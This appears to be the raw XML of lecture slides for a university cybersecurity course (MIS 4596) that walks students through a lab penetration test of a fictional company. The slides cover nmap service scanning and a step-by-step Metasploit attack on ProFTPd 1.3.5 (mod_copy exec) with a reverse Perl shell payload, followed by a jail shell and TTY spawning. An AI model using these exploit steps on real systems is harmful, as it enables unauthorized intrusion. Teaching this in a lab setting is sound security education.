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441" r:id="rId3"/>
    <p:sldId id="427" r:id="rId4"/>
    <p:sldId id="257" r:id="rId5"/>
    <p:sldId id="258" r:id="rId6"/>
    <p:sldId id="259" r:id="rId7"/>
    <p:sldId id="260" r:id="rId8"/>
    <p:sldId id="261" r:id="rId9"/>
    <p:sldId id="436" r:id="rId10"/>
    <p:sldId id="437" r:id="rId11"/>
    <p:sldId id="430" r:id="rId12"/>
    <p:sldId id="438" r:id="rId13"/>
    <p:sldId id="439" r:id="rId14"/>
    <p:sldId id="440" r:id="rId15"/>
    <p:sldId id="265" r:id="rId16"/>
    <p:sldId id="431" r:id="rId17"/>
    <p:sldId id="271" r:id="rId18"/>
    <p:sldId id="262" r:id="rId19"/>
    <p:sldId id="270" r:id="rId20"/>
    <p:sldId id="272" r:id="rId21"/>
    <p:sldId id="429" r:id="rId22"/>
    <p:sldId id="280" r:id="rId23"/>
    <p:sldId id="263" r:id="rId24"/>
    <p:sldId id="264" r:id="rId25"/>
    <p:sldId id="434" r:id="rId26"/>
    <p:sldId id="266" r:id="rId27"/>
    <p:sldId id="267" r:id="rId28"/>
    <p:sldId id="442" r:id="rId29"/>
    <p:sldId id="268" r:id="rId30"/>
    <p:sldId id="43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B534C7-AFA2-4865-BF97-165B29A0A2E9}" v="1" dt="2024-10-22T17:57:24.3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5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Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{D075CEB2-7264-4F6F-837C-CBA3CA64DBB3}"/>
    <pc:docChg chg="undo custSel delSld modSld">
      <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{D075CEB2-7264-4F6F-837C-CBA3CA64DBB3}" dt="2024-03-26T14:36:31.396" v="2" actId="14100"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{D075CEB2-7264-4F6F-837C-CBA3CA64DBB3}" dt="2024-03-26T14:36:31.396" v="2" actId="14100"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2176114069" sldId="429"/>
        </pc:sldMkLst>
        <pc:picChg chg="mod">
          <ac:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{D075CEB2-7264-4F6F-837C-CBA3CA64DBB3}" dt="2024-03-26T14:36:31.396" v="2" actId="14100"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2176114069" sldId="429"/>
            <ac:picMk id="7" creationId="{DDC35475-882D-24AF-F36A-AC08D00D514F}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{D075CEB2-7264-4F6F-837C-CBA3CA64DBB3}" dt="2024-03-20T11:53:20.315" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4183671732" sldId="442"/>
        </pc:sldMkLst>
      </pc:sldChg>
      <pc:sldChg chg="del">
        <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{D075CEB2-7264-4F6F-837C-CBA3CA64DBB3}" dt="2024-03-20T11:53:20.315" v="0" actId="47"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370449395" sldId="443"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="Darin Bartholomew" userId="4311a273c03b4836" providerId="LiveId" clId="{1EB534C7-AFA2-4865-BF97-165B29A0A2E9}"/>
    <pc:docChg chg="addSld modSld">
      <pc:chgData name="Darin Bartholomew" userId="4311a273c03b4836" providerId="LiveId" clId="{1EB534C7-AFA2-4865-BF97-165B29A0A2E9}" dt="2024-10-22T17:57:24.382" v="26"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="Darin Bartholomew" userId="4311a273c03b4836" providerId="LiveId" clId="{1EB534C7-AFA2-4865-BF97-165B29A0A2E9}" dt="2024-10-22T17:54:53.103" v="25" actId="1035"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="2714573539" sldId="440"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="Darin Bartholomew" userId="4311a273c03b4836" providerId="LiveId" clId="{1EB534C7-AFA2-4865-BF97-165B29A0A2E9}" dt="2024-10-22T17:54:53.103" v="25" actId="1035"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="2714573539" sldId="440"/>
            <ac:spMk id="13" creationId="{B959B79D-1579-4DA8-9997-F060D32C61C7}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
      <pc:sldChg chg="add">
        <pc:chgData name="Darin Bartholomew" userId="4311a273c03b4836" providerId="LiveId" clId="{1EB534C7-AFA2-4865-BF97-165B29A0A2E9}" dt="2024-10-22T17:57:24.382" v="26"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="1498265443" sldId="442"/>
        </pc:sldMkLst>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DD5BD31C-0EA9-4945-ABCC-45A69BCC6E89}"/>
    <pc:docChg chg="modSld">
      <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DD5BD31C-0EA9-4945-ABCC-45A69BCC6E89}" dt="2024-01-10T21:33:32.655" v="2" actId="20577"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="modSp mod">
        <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DD5BD31C-0EA9-4945-ABCC-45A69BCC6E89}" dt="2024-01-10T21:33:32.655" v="2" actId="20577"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4230234153" sldId="256"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DD5BD31C-0EA9-4945-ABCC-45A69BCC6E89}" dt="2024-01-10T21:33:32.655" v="2" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4230234153" sldId="256"/>
            <ac:spMk id="3" creationId="{428E392C-65A1-49E9-943D-3788DB4A400C}"/>
          </ac:spMkLst>
        </pc:spChg>
      </pc:sldChg>
    </pc:docChg>
  </pc:docChgLst>
  <pc:docChgLst>
    <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}"/>
    <pc:docChg chg="undo custSel addSld modSld">
      <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T01:11:39.930" v="28" actId="22"/>
      <pc:docMkLst>
        <pc:docMk/>
      </pc:docMkLst>
      <pc:sldChg chg="addSp modSp new mod">
        <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T00:07:28.807" v="24" actId="1076"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="4183671732" sldId="442"/>
        </pc:sldMkLst>
        <pc:spChg chg="mod">
          <ac:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T00:03:42.527" v="22" actId="20577"/>
          <ac:spMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4183671732" sldId="442"/>
            <ac:spMk id="2" creationId="{E44B0B00-F594-3969-662C-923B4439F71F}"/>
          </ac:spMkLst>
        </pc:spChg>
        <pc:picChg chg="add mod">
          <ac:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T00:07:28.807" v="24" actId="1076"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="4183671732" sldId="442"/>
            <ac:picMk id="5" creationId="{5DF185A9-203C-4AB4-783F-BB75479B6FB2}"/>
          </ac:picMkLst>
        </pc:picChg>
      </pc:sldChg>
      <pc:sldChg chg="addSp delSp new mod">
        <pc:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T01:11:39.930" v="28" actId="22"/>
        <pc:sldMkLst>
          <pc:docMk/>
          <pc:sldMk cId="370449395" sldId="443"/>
        </pc:sldMkLst>
        <pc:picChg chg="add del">
          <ac:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T01:11:32.600" v="27" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370449395" sldId="443"/>
            <ac:picMk id="5" creationId="{C99C3840-21E7-77A8-2D96-AB598FD09B51}"/>
          </ac:picMkLst>
        </pc:picChg>
        <pc:picChg chg="add">
          <ac:chgData name="David Lanter" userId="ffe310d6-75e8-40c5-b92a-0b49b26d9e52" providerId="ADAL" clId="{DDF5E676-ABC9-4DCD-96F7-B32044EF9577}" dt="2024-03-19T01:11:39.930" v="28" actId="22"/>
          <ac:picMkLst>
            <pc:docMk/>
            <pc:sldMk cId="370449395" sldId="443"/>
            <ac:picMk id="7" creationId="{F0036981-8853-7F01-EDE8-27D0A074A2E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1B967-9D74-4611-B0C2-140712FCFDA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0392B-2A0E-4B21-A219-3079E1F52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9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10A35-43B1-4DC5-BCC9-B7ABE7415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DB5137-86DA-4565-B683-F88B412BC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34CE1-F61C-44A0-8FBC-413948961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00A92-674A-4ECD-BFEF-DE72B63C125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49CF2-2799-4F30-B4C1-F67049B1B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9B595-3B2A-48BE-B841-EA15B52CA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47FB-75F3-4F16-A9C1-76B994547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61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CDFBB-740D-4C75-8FC8-C9E8762FF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FAC149-5C48-4BCF-9B80-913A25C5BB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58792-AF9D-4229-A073-0A6A0A518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00A92-674A-4ECD-BFEF-DE72B63C125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8FFC8-0341-43EF-B306-6C82D3953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11CB6-9E01-4EE0-920C-3EF8F0F1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47FB-75F3-4F16-A9C1-76B994547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47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1C29EE-EF5A-46FB-B836-86D038B6D0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8226A3-B3B7-4CB8-90EA-E983092D7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2FA0A-57F0-453C-A594-9E15CD098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00A92-674A-4ECD-BFEF-DE72B63C125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A8E74-1877-4E41-9012-FAEB424A3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9E2D4-895A-4C31-A6E9-8A3DD2D1A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47FB-75F3-4F16-A9C1-76B994547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17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1A7EA-9B44-4BCA-A9C7-832EC8C79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BDA5D-F7B2-4503-BC2B-679C371F6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D2563-6161-4870-A084-E15FDC072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00A92-674A-4ECD-BFEF-DE72B63C125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4E120-1551-4450-B503-32EAEC4AD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A2D70-9CA0-4474-A298-38014C213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47FB-75F3-4F16-A9C1-76B994547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10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AB409-2DAF-41BC-BD8E-B5BC3BE9A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7DE14-9A3B-4BEE-B12A-A56A31786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C5398-98D7-4ECD-88C8-19772FF73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00A92-674A-4ECD-BFEF-DE72B63C125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96663-C437-41AA-8454-CD834B09E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40DDD-EA19-42C6-A63B-29D290DEB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47FB-75F3-4F16-A9C1-76B994547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9A752-F162-44FA-93C8-AE85D2283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A07F5-BDBE-4230-AFA1-F2E9B0E5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126E09-71EB-497F-A8FE-84F33C266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E3B15-C03C-4DA7-AC8F-B853E2788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00A92-674A-4ECD-BFEF-DE72B63C125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D208D1-E34C-4DCB-BFE0-6A66E8286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1E234-DB51-45D9-A8BD-0435EF5A4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47FB-75F3-4F16-A9C1-76B994547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38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6B09D-B53A-46F8-8535-D79803C5B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C23FD-7959-4F64-8AA9-D0F8E13CA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372E21-55F9-407E-9756-E641F1AFF3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C93A08-5071-4A1F-91C1-FD996B699B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3483F1-F4C6-4E58-8935-157478418A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4D9147-C732-46C0-954B-608004AF8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00A92-674A-4ECD-BFEF-DE72B63C125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9B24DA-D7A7-4195-93EA-2EC6C499C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58C5FB-84D2-4931-AF8E-782E7E50C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47FB-75F3-4F16-A9C1-76B994547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00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02838-2B7B-4340-98C2-209BF7461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605D9D-D4A7-437B-B847-6811C79CE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00A92-674A-4ECD-BFEF-DE72B63C125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9FDB8-6D34-4B1C-9278-4F1FAD50D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34AC4-675D-41BE-8BF0-43C811D5C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47FB-75F3-4F16-A9C1-76B994547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60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1E7ECD-A0B7-4FAD-80B6-AB85F575A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00A92-674A-4ECD-BFEF-DE72B63C125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A322F4-7D6C-4182-8C72-540164F7F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84236C-7F9A-447A-A9F1-CA43FEEB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47FB-75F3-4F16-A9C1-76B994547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75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0E4B-E6C4-4791-B87B-BEA0AEF1F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2521F-55D6-452D-B6D1-26D3989C6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25E2A8-FE98-42D1-9EE7-A6D14E093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5BECE2-B94B-4648-B3E5-F240A61DB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00A92-674A-4ECD-BFEF-DE72B63C125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1D269E-FB73-4856-B075-EBCCCA66F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2AA5F5-FD61-453D-92E8-F5436C83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47FB-75F3-4F16-A9C1-76B994547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30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81F84-D166-4FCB-B037-307A1CC50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6843F7-82FB-4E3B-9135-EA901B83D9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FA5C25-A96E-439F-8D1B-4B99CCA0C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A8D3DE-76AF-495A-8050-5605F19E4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00A92-674A-4ECD-BFEF-DE72B63C125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32CE9-3DDE-4020-A9B3-C195807DD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BEF1DA-470D-4EFF-AAB9-78B11BFF0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47FB-75F3-4F16-A9C1-76B994547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06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62FC2C-E152-4132-BC1B-9DBFBF416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AF65A-0567-4126-9C24-7A75DE501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2A478-4B71-4D7E-95FD-C10948DB0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00A92-674A-4ECD-BFEF-DE72B63C125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77723-8748-4224-9848-33BDD460A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4954A-46CB-4FD6-AC43-4B0EE74F6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647FB-75F3-4F16-A9C1-76B994547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66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security-assignments.com/projects/pen-test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nmap.org/book/man-version-detection.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/man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nmap.org/book/man-version-detection.html" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://nmap.org/book/man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ecurity-assignments.com/projects/pen-test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6810B-1748-4F3F-99BB-A68CD30F6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1122363"/>
            <a:ext cx="1040384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Managing Enterprise Cybersecurity</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0"/>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>MIS 4596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8E392C-65A1-49E9-943D-3788DB4A40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/>
              <a:t>Unit #15a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234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8C0F0-AFCC-4A72-93EA-DA251F307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933778"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>Milestone 3 Assignment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97CBC-5C46-42E4-87E3-036D51B12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CA64E-1842-4EEC-BC76-121BB2901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068" y="0"/>
            <a:ext cx="246893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B90893-11E1-4243-8AE5-C387D598D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065" y="933778"/>
            <a:ext cx="6991709" cy="598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52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3E643-7124-4063-8053-BFE6D2C5A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0435905" cy="1629540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>nmap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/>
              <a:t>It can help you determine what services are  running?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96F36F-2B8F-4F2D-B89F-42F3B23DACB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464649" y="1629540"/>
            <a:ext cx="6825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Nmap flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is for service version scanning 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959B79D-1579-4DA8-9997-F060D32C61C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028506" y="4056192"/>
            <a:ext cx="847725" cy="3905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DE827B-73A6-445E-BE04-26BB2FBF2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9164" y="-1"/>
            <a:ext cx="1682836" cy="2152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42D460-758A-4093-9A90-A5C32657E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428" y="2310831"/>
            <a:ext cx="9699618" cy="442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9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6F4D8-C772-4FD0-BAC8-B0BE058AD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4547" y="1825625"/>
            <a:ext cx="2617238" cy="10015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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What can you learn by exploring </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Humbleify’s</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" b="1" i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t> web site?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D26D14-22AB-40AA-8996-6C0591115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5" y="60649"/>
            <a:ext cx="9624800" cy="655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63D528-50F9-43FA-95E1-9D2E2E366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976"/>
            <a:ext cx="8984946" cy="630887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F398665-7A3B-4C7C-AFA9-D96DF1BFD06A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9078686" y="1825625"/>
            <a:ext cx="2617238" cy="1001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i="1" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="FF0000"/>
                </a:solidFill>
              </a:rPr>
              <a:t>What does this information represent?</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="194742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3E643-7124-4063-8053-BFE6D2C5A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0435905" cy="1629540"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit fontScale="90000"/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Remember </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>nmap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/>
              <a:t>It can help you determine what services are  running?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96F36F-2B8F-4F2D-B89F-42F3B23DACB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2464649" y="1629540"/>
            <a:ext cx="6825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Nmap flag </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0" err="1">
                <a:hlinkClick r:id="rId3"/>
              </a:rPr>
              <a:t>sV</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t> is for service version scanning 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959B79D-1579-4DA8-9997-F060D32C61C7}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1028506" y="3644716"/>
            <a:ext cx="847725" cy="3905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DE827B-73A6-445E-BE04-26BB2FBF2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9164" y="-1"/>
            <a:ext cx="1682836" cy="2152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42D460-758A-4093-9A90-A5C32657E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428" y="2310831"/>
            <a:ext cx="9699618" cy="442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7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654041-7C39-4ACE-BC8A-D8A2E71F9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151" y="2363033"/>
            <a:ext cx="7572865" cy="4457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96C454-3253-4DCB-ABC0-D84BF6759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Metasploit Framework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EFFF7-0691-4DEE-BCBD-E8299719E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68400"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Let’s see what exploits are available for ftp and </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>ssh</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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/>
              <a:t>ProFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1.3.5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8762FE-CC1F-4E95-9244-656A66F2E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93" y="2325767"/>
            <a:ext cx="1619551" cy="45322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FD1CD0-3A97-41D8-A121-B57C86381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831" y="1856942"/>
            <a:ext cx="6743137" cy="470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8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6C454-3253-4DCB-ABC0-D84BF6759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08660"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Metasploit Framework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EFFF7-0691-4DEE-BCBD-E8299719E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310" y="708661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err="1"/>
              <a:t>ProFTPd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> 1.3.5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7EDC3E-2F96-4731-A4EF-1EF8F7662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215" y="0"/>
            <a:ext cx="2312785" cy="685800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256D8610-24FE-4A9E-8864-30146749C01F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9794248" y="2642483"/>
            <a:ext cx="111964" cy="79828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CE7218-66F0-4F9E-97A9-EB4420C2E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052" y="1655761"/>
            <a:ext cx="7426115" cy="5099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EF304F-A74C-47C8-AB37-CAC639000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73460"/>
            <a:ext cx="12679812" cy="56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3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D5EF61-6195-4B1D-994E-5D0FB2F86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993" y="0"/>
            <a:ext cx="504500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642E65-4BCE-4A45-B8B0-54DA6F8F9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19" y="669817"/>
            <a:ext cx="6538532" cy="503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73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6C454-3253-4DCB-ABC0-D84BF6759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Metasploit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47572-E405-4B8F-90D7-51DB032AB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325563"/>
            <a:ext cx="52578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Switch to root, i.e.“</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>su</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>” user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msfdb</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1"/>
              <a:t>init</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US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msfconsole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AF8049-4628-462A-98AF-5565DFFF2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924050"/>
            <a:ext cx="8164513" cy="489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87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65CD9-2C5B-42C5-8C92-15C6F29F8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2E464-F86B-4362-A6CD-23FFDBCEA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D95EDD-08D6-41CE-8BB0-154B3EE43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6183"/>
            <a:ext cx="12192000" cy="298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91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AA1C1-907F-2502-57EF-190296F27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FD1776-5F42-9ADF-F11E-273EBAFAD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81" y="261537"/>
            <a:ext cx="11424237" cy="560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13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E161-56FB-45A1-9207-C4C593E12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6217D-D3D5-4ADB-8D3E-9E502B0D1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25567D-B3C4-4894-A8BF-6F078CDB9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1" y="276225"/>
            <a:ext cx="12133670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90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71A38-75D8-4F8C-97AF-26BFAF449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Steps to perform the exploit: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04160-0C00-470D-9BCB-2E05AB300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63625"/>
            <a:ext cx="5908964" cy="4351338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Enter command ‘</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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msfconsole</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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’ to open up Metasploit Framework</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Search name: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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proftpd</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter ‘use exploit </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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/ftp/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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proftpd_modcopy_exec</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter ‘show payloads’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter ‘set payload 5’ or ‘set payload </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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cmd</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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16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unix</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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16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reverse_perl</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter ‘set LHOST 192.168.56.101’ </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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IP address of your own kali machine </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter RHOST 192.168.56.200</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter ‘set </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="16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sitepath</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1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/var/www/html/’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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Enter ‘exploit’</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="14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u="none" strike="noStrik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99D94-EFEB-0504-25BE-818AB93F2B80}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6179127" y="971774"/>
            <a:ext cx="5715000" cy="873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If you have entered everything correctly, your terminal shell should look like this: </a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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7" name="image8.png">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DDC35475-882D-24AF-F36A-AC08D00D514F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId2"/>
          <a:srcRect t="47777" b="2222"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5950526" y="2033153"/>
            <a:ext cx="6123709" cy="210935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17611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CD94E-F3E6-427C-86E3-7FEC2DB34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0D6CB-4BE0-4D28-BBC7-F02A91C24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D7CF1E-302E-4152-BD2B-6EB945300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60728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2A8D3D-F9E3-0CBD-8DE5-C44E00764B23}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="540774" y="5604387"/>
            <a:ext cx="2458065" cy="265471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42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71277-85C2-4BC9-8019-FA3F4ED0D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95350"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>We obtained a “Jail shell”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9D2FA-69CF-426C-8572-D88D4CE48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748D9E-24D8-4154-9737-6B5087D52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524" y="1028700"/>
            <a:ext cx="10611476" cy="58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07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8F863-DD20-49A9-AC24-E8B1E81FE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Spawning a TTY (“teletype” terminal) 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6475B-E34F-47E0-BF32-45FA70847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044575"/>
            <a:ext cx="10515600" cy="4351338"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
